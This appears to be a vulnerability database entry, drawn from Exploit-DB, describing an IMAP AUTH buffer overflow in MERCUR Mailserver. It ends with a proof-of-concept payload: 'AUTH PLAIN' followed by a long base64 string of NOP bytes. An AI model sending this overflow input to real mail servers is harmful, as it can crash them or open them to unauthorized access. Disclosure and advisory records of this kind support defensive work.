MERCUR Mailserver IMAP AUTH Command Buffer Overflow Vulnerability

vendor:

MERCUR Mailserver

by:

Unknown

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MERCUR Mailserver

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2003-1403

CPE: mercur_mailserver

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

MERCUR Mailserver IMAP AUTH Command Buffer Overflow Vulnerability

A buffer overflow vulnerability exists in MERCUR Mailserver when handling the IMAP AUTH command. An attacker can exploit this vulnerability by submitting an overly long command, which may result in unauthorized access to a vulnerable system.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8861/info

A problem has been reported in MERCUR Mailserver when handling the IMAP AUTH command. The issue occurs when an overly long command is submitted, which may be due to a buffer overrun. This problem may make it possible for an attacker to gain unauthorized access to a vulnerable system. 

On the IMAP port:

AUTH PLAIN
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ